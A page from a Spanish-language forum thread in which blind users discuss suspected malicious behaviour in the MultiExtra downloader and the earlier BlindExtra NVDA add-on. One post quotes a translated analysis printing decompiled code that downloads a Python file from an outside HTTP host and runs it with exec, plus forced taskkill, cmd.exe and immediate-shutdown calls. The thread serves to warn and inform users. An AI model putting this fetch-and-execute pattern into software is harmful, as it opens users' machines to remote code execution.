hablemos sobre multi extra

188 Nachrichten, 7 Seiten:  1 2 34 5 6 7 ↖ Zurück zur Themenliste

~msgScore~: +0

91. claribel,

Huy, me va a robar mi cuenta de skype (que como es inaccesible en Windows, o por lo menos a mí no me gusta su accesibilidad), no lo uso. Fua, conmigo fracasó en eso. otra cosa, me va a robar mi cuenta bancaria, la cual está tan llena de dólares que jamás entro desde mi pc, no sea cosa que mi millonada desaparezca en manos de un cieguito. Y además, me robará la contraseña del correo que armé en tumailfavorito.com, para ingresar a Facebook una vez al año. En fin, creo que es excelente que los chicos informen acerca del malware que incluye MultiExtra, y creo, también, que es buenísimo que cada quien elija lo que hará al saber tal info. Saludos, y gracias por ponernos alerta al respecto.

~msgScore~: +0

92. Yeri_mua ,

oigan a m{i me sucede algo... quiero descargar un programita, concretamente el navegador sea mokey co el multiextra y pues lo vengo intentando desde ayer y no se que asa que me cierra el programa, pero sequeda su proceso residente en segundo plno...

~msgScore~: +0

93. EL_REY_HALCON ,

Creo que es normal

~msgScore~: +0

94. feliz ,

tienes su página oficial para descargarlo, me refiero al sea monkey, saludos

~msgScore~: +0

95. La_Maestra_Joha ,

advertencia: Se ruega a potions, kitoshi y Harry_poter que dejen sus batallas personales en los espacios públicos de la sala de juegos. La próxima se tomarán medidas. Gracias

~msgScore~: +0

96. javino ,

de acuerdo con @seve. la tecnología es como la calle. con el solo hecho de sentarte en la terraza, corres el riesgo de que te roben, por muy seguro que sea tu bario. así, con el solo hecho de conectarte a internet, ya tienes riesgo de que se te meta un virus. hay virus que entran así por la red, sin que instales ningún programa. son casos muy raros pero los hay.

~msgScore~: +0

97. Nicky_Jam ,

Nosotros no lo sabemos, pero esas empresas que tan enganchados nos tienen en realidad se están dando diariamente un gran festín con el dinero que nosotros mismos sin saberlo les estamos dando. Y los muy hdp se están dando la gran fiesta y no me invitan... jum! ah eso no. xd.

~msgScore~: +0

98. Aragorn-Elessar,

Jajajaja, sí amigo, No se vale! Que inviten aunque sea a un café! Ya en serio, y hablando de virus, recuerdo cuando tuve el primero que se me instaló; supongo que por tanta porquería que descargaba. La cosa es que esa vez, estaba a punto de instalarme el avast, pero unos amigos en una mesa libre, casi que me ordenaron instalarme el malwarebites. Nah, es broma. Pero sí me aconsejaron encarecidamente ese antivirus. Pues, el mentado hizo su trabajo... Demasiado bien, quizá; porque luego las aplicaciones nativas no me andaban ni de co**, y tuve que formatear mi pc, y sólo así la arreglé. Yo tenía la ilusión de descargarme el ofice con el multiextra; pero tras todo lo acontecido... Jum... Toca ver otros lados

~msgScore~: +0

99. feliz ,

por todos es sabido que en internet hay amenazas, aquí la cuestión es que este programa realiza una serie de conexiones y tareas que otros programas ni por asomo realizan, para colmo, lo programó/desarrolló una persona de nuestro colectivo, de nuestro gremio y es lo que fastidia igual que con todo lo demás, yo ya lo dije, como programa es perfecto, siempre y cuando no se haga con maldad, con malicia o para joder a los demás, puedo entenderle que no pueda costearse un certificado para firmarlo como pone en su página, de ahí a realizar tareas con suddown ya va mucho

~msgScore~: +0

100. baby-elromance ,

mensaje editado

~msgScore~: +0

101. shodan ,

De todo lo que opino y de la cual conozco al desarrollador Sá(t)tar y de la cual no quiero criticarle (por la patria no me juren), Sinceramente no sé que tengo que decir, ya que si el programa contiene virus y por alguna razón lo desinstalé (por qué patrias?)

~msgScore~: +0

102. pia_gc ,

¿qué conecciones hace? ¿alguien ya descompiló el programa?

~msgScore~: +0

103. feliz ,

revisa el mensaje 28, si, ya se hizo, solo que la mayoría no lo notará porqu el firewall de windows no le va a alertar de ese tipo de conexiones, saludos

~msgScore~: +0

104. Nicky_Jam ,

Chicos, es muy simple. El que lo quiera usar adelante, que lo use bajo su propio riesgo.

~msgScore~: +0

105. feliz ,

ojalá se programe algo mejor y sin esas conexiones

~msgScore~: +0

106. b_y_l_2014 ,

nooo, yo que ando usando multiextra... dios, que cosas terribles hace este programa... menus mal que no copio contraseñas al portapapeles y espero que no acceda al historial con windows más v ya que tengo cosas inportantes en el historial...

~msgScore~: +0

107. sol-dorado,

Para hablar a fondo del tema partiré de un complemento, blind extra. en el hilo de audiogames dicen lo siguiente:
Hola.
bueno, vean este tema entonces, no es de mi mente, la compañía de nvda lo escribió.
https://addons.nvda-project.org/addons/blindExtra.en.html
Ahora, la traducción del oque dicen ahí:
Blind Extra
• Autor: Ahmed Star
Este complemento reclamaba permitir el acceso a cierto software adicional.
En noviembre de 2016, este complemento fue marcado como un troyano de acceso remoto (accediendo de forma remota a otra computadora y dañando archivos sin que los usuarios lo supieran) por miembros de la comunidad de complementos de NVDA por los siguientes motivos:
• Renombrar archivos después de usarlos por un tiempo sin que los usuarios lo noten.
• Acceso remoto, incluido el envío de mensajes de Skype.
Nota: este complemento nunca se alojó en el sitio web de complementos de la comunidad.
La comunidad de complementos exhorta a los usuarios de NVDA a que desinstalen este complemento y ejecuten programas antivirus, así como a formatear su disco si hay información sensible en esta computadora. La comunidad de complementos también desea recordar a los usuarios que tengan cuidado al instalar complementos de fuentes no confiables, ya que los complementos de NVDA pueden realizar varias cosas, incluido el acceso al sistema de archivos e Internet. Los complementos de NVDA son piezas poderosas de software que pueden hacer cosas increíbles, pero deben tratarse con cuidado. Los complementos que no provienen de este sitio no están controlados por la comunidad de complementos. Gracias.
Última edición: 12 de noviembre. 08:51:09 2016
Luego en el mensaje 35 del hilo el usuario jaybir dice:
Creo que lo importante aquí es que cuando la gente habla de robar archivos, lo que quieren decir es copiar sin su permiso.
Si alguien irrumpe en su casa y le roba el microondas o la televisión, lo sabría de inmediato porque ya no lo tiene. Si alguien ingresa a su computadora y roba sus archivos, generalmente no quiere que usted lo sepa, por lo que no los eliminará de su sistema. Así que puedes mantener tus archivos y seguir pensando que nada está mal, mientras que los malos también tienen tus archivos y, dependiendo de qué tipo de archivos sean, pueden hacer todo tipo de cosas indeseables, por lo general sin implicar ningún cambio en absoluto
en la forma en que funciona su computadora. Así que continúas pensando que nada está mal, hasta que un día alguien más libera un programa usando algo de tu código fuente. O alguien roba su identidad usando registros financieros robados de su computadora. O cualquier número de otra cosa.
Ahora paso a exponer lo que se dice de multi extra con el fragmento de código que se expuso, aquí me abstengo de comentar, ya que no soy programador en python, pero así por ensima entiendo algo de lo que se dice, y dejo
a los que saben para que lo amplíen.

BIEN BIEN. Todo el mundo lo refresca. Mientras hablamos, estoy realizando el sandboxing del programa y publicaré mis conclusiones una vez que haya desempaquetado los archivos de configuración y pueda acceder al ejecutable real.
(la configuración en sí no es perjudicial, según Virus total. Al analizar el programa instalado en mi sandbox, noto muchas cosas fuera de lo común, una de las cuales es notable: ¡este programa está escrito en Python! Python 3.6, para ser precisos. Al extraer el archivo de configuración ("instalarlo" en mi zona de pruebas) y al extraer el archivo .exe, veo los archivos de archivo de pyinstaller, y ahora tengo el código de bytes de Python compilado. En esta etapa, la descompilación es trivial: veo que la aplicación tiene el estándar de Python stdlib, chardot, y este archivo llamado ... MEX.pyc. Mmm ... y que podría ser esto?
¡Oh queridos! Algún código sospechoso! Mirad, amigos:
import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext De aquí lo que mas me llama la atención es el fragmento webbrowser y el fragmento clipboard
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())
Mirando este archivo "max.py" ...
Primero, importa sus módulos "necesarios". Luego ... hay un controlador de excepciones que hace que intente eliminarse del sistema de archivos. Si eso falla, no hace nada.
A continuación, intenta cambiar a c: ProgramData MultiExtra.
No demandar cómo funcionará eso ya que la aplicación no la crea (tal vez la configuración sí lo hace). Luego crea una carpeta de datos de aplicaciones y crea su archivo multiextra.ini.
Lo curioso, sin embargo, es cuántas descargas hace esta cosa. Hay otra descarga en la línea 92 (el resto de la discusión anterior está haciendo su configuración normal) que se lee utilizando la URL
http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Tenga en cuenta la falta de 'https'). Este archivo ... no parece contener nada, si lo busco. También se enlaza a NVDA, también. (Tenga en cuenta que este es el archivo NVDA "real" y no es malicioso; solo la versión 2018.1.1, pero lo reemplaza con la última versión en softpedia por algún motivo).
Línea 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
También ejecuta el símbolo del sistema:
Línea 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
Y esto...
Línea 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
Y, por supuesto, el final de la aplicación, cuando se intenta realizar tareas en sí mismas en lugar de salir correctamente:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Algunas cosas a tener en cuenta con estas llamadas de subproceso:

  • Línea 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info):
  • Este no es dañino, a menos que, por supuesto, lo establezca en algo como el PID de csrss u otro proceso crítico del sistema si puede obtener ese nivel de privilegio.
  • Línea 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info):
  • Este es ... totalmente innecesario y sin sentido. No lo entiendo Realmente no entiendo lo que se intenta hacer (creo que "MultiExtraDownloads Apps" es una especie de script ejecutable o por lotes o algo así).
  • Línea 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info):
  • -s apaga la computadora, solo; -t (/ t) le pide que haga un cierre inmediato.
    También hay algunas otras llamadas os.remove que están aquí. Me encantaría descompilar completamente todo el código y subirlo a algún lugar para que personas como cartertemm lo revisen y lo revisen.
    En cuanto a la acusación de que "este programa hace referencia a los archivos", lo estoy comprobando.
    OK, no puedo confirmar eso de ninguna manera. No utiliza shutil o redes, que puedo ver de todos modos, aparte de urllib. No usa shutil, por lo que no puede hacer copys a granel, y no usa os.rename, os.renames o os.link/os.unlink, ni se comunica con ningún servidor remoto a través de protocolos poco claros. No es que yo pueda encontrar, en todo caso. Así que creo que por ahora podemos descartar esa acusación (aunque no cuente con eso, no he descompilado todo el árbol de programas).
    En resumen: el programa realiza una actividad perturbadora que me gustaría que otros realizaran (no voy a leer todo el programa). En la superficie es * no * perjudicial. Repito: es * no * dañino en la superficie. Sin embargo, evitaría las acusaciones y los comentarios destructivos hasta que la gente como cartertemm (e incluso yo mismo si decido sumergirme en ese lío de código) pueda analizarlo por completo. Mientras tanto, dejaría de usarlo para no ser golpeado por algo que no hayamos encontrado.

En conclución, y yo que no me leí todo el hilo, el programita hace lo suyo y a grandes rasgos, pero como dice el texto de mas arriba, nadie lo cree hasta que pasa algo. Si en algúnm momento escribo un juego con un cierto punto de código malicioso en bgt pero a nadie le pasa nada visible, nadie creerá cuando llegue una acusación.
Si luego comienzan a salir a la luz públicas cosas privadas de usuarios las cuales no han ventilados, ahí todos van a creer. Aquí hay gente con mucho conocimiento, y lo suficientemente talentosa como para estar
haciendo cosas raras perjudicando a los demás, y no les importa. En vez de estar usando sus conocimientos para algo bueno; pero así es la vida y como es hay que vivirla.

~msgScore~: +0

108. pia_gc ,

wow, muchísimas gracias

~msgScore~: +0

109. sol-dorado,

Ahí hablo de dos cosas: Blind extra, y multi extra, que no son para nada recomendables, sepan también que no me leí el resto del hilo en audiogames, pero es lo que hay, de usarlo o nó,
cada quien que lo ejecute bajo su propio riesgo

~msgScore~: +0

110. Aragorn-Elessar,

Ostia mi bro, yo que de programador no tengo ni la p, te juro que logré entender a qué llegabas con ese mensaje. Básicamente con cuanto acabás de soltar, en mi cerebro se ha prendido un macroletrero de neón que reza: advertencia: ¡Programa malrollero! Sólo quisiera solicitar a los congéneres introducidos de lleno en la programación, que a la hora de querer compartirnos sus hallazgos, sean un poco más inteligibles a la hora de expresarse; porque no pasan ni cinco líneas de código, cuando muchos ya sentimos cómo nuestro cerebro echa chispas por todo lo alto. Por lo demás, gracias por la prevención

~msgScore~: +0

111. feliz ,

OS RESUMO LO QUE HACE EL PROGRAMITA, ASÍ, PARA QUE LO USEIS A PLACER Y LE DEIS VUESTROS ARCHIVOS Y ACCESO A VUESTRO SKYPE.

  1. Cuando se ejecuta descarga un código desde un servidor externo que ejecuta cuando le apetece. Primer síntoma de que algo no va bien ahí. Ningún desarrollador va a descargar un cacho de código para luego ejecutarlo más adelante. Si tú haces un programa, lo haces entero, no lo haces y luego le dices que descargue código python desde otro sitio.
  2. Hace llamadas al cmd.exe. en principio parece inocuo, pero ¿Recordais el código que se descarga y ejecuta cuando le apetece?
  3. Finaliza procesos con taskill. Pues eso.
  4. Hace llamadas al portapapeles, a saber para qué.
  5. hay por ahí una llamada a shutdown.exe con los argumentos -f -s -t 00.
  6. Se menciona algo sobre control de archivos y Skype, a alguien le recuerda a BlindExtra y su manía de enviar span por Skype y cambiar nombres, pero no está muy claro.
  7. Y algo más me dejo, pero ahora mismo no recuerdo. De todos modos, a mi que descargue código sin avisar y que lo ejecute... Mucha confianza no me da. todo el mérito es de BOFH, yo añado, en la página de amet pone que es detectado por windows defender porque no está firmado el programa, saludos

~msgScore~: +0

112. BOFH ,

@sol-dorado lo explicó mejor que yo al traducir todo aquello. a mi me dio pereza, la verdad.

~msgScore~: +0

113. feliz ,

en tu mensaje lo explicaste perfectamente

~msgScore~: +0

114. shodan ,

Yo... vaya... otro... No tengo ni idea de lo que estoy leyendo, código sospechoso y oriental que de todas formas... Recuerdan en Klango cuando hablamos del blind extra y que yo lo compartí? al final quando sattar dijo que no le importa las acusaciones y que descontinuó el proyecto y que yo le decía muchas veces que violó los derechos de autor de las compañías de texto a voz?

~msgScore~: +0

115. marciano ,

Error, en el documento max.txt hay un texto que dice:

fix windows 8.1 64bit download link
fixed the error when you try to download windows or language packs
fix error 404 notfound when you try to download addons of nvda
best regards friends
De hecho este es el mensage que sale en el diálogo de descargar programas, juegos, y sistemas operativos. Pero lo que no entiendo es eso, por qué ponen a descargar código o texto desde un servidor... Y hago una pregunta curiosamente curiosa... Cömo hicieron para descomprimir/extraer el exe? por que yo almenos con winrar o 7zyp me da error.

~msgScore~: +0

116. sol-dorado,

Bueno, yo solo quise tomarme un momento para despejar lo mas que pudiera, y reconozco que es casi inevitable no entrar en tecnisismos cuando de cosas así se trata. @BOFH lo explicó muy bien, fue corto y directo,
y lo que hice fue reforzar su explicación que fue lo suficientemente buena, apoyándome en información de oficial de otras personas. Nada nada, a tener cuidado con lo que instalamos y ejecutamos en nuestros equipos informáticos.

~msgScore~: +0

117. italiano86 ,

@feliz, eso que pusiste es exactamente el mismo texto que me mandó hace diías peter reina por dm en twitter. acaso eres peter reina? jajaj pero ya fuera de broma. tiene razón ese texto porque ahora que me acuerdo, sí me pasó que una vez mientras descargaba una aplicación con ese programa, tenía de fondo el tapin radio ya que estaba escuchando un programa de deportes en ESPN en inglés, y sin saber por qué, se me cerró el tapin. entonces ya entiendo, fue el dichoso código que se ejecutó sin avisar!

~msgScore~: +0

118. feliz ,

ese texto es de @BOFH, está bien explicado, más lo que añadió el sol dorado y que en su página pone que es detectado por windows defender, más no hay que añadir

~msgScore~: +0

119. SieteDeNueve,

Lo estaba ejecutando en una máquina virtual donde no tengo nada. Se actualizó, y ahora no funciona, porque sale un mensaje donde dice que el servidor lo forzó a pedir 150 dólares por año para comprarlo, luego botón OK, y eso es todo.

~msgScore~: +0

120. feliz ,

si, eso pone amet en su página, también con respecto a windows defender

~msgScore~: +0

188 Nachrichten, 7 Seiten:  1 2 34 5 6 7 ↖ Zurück zur Themenliste

Auf das Thema antworten

Sie müssen angemeldet sein, um posten zu können

Passwort vergessen? Benutzerkonto erstellen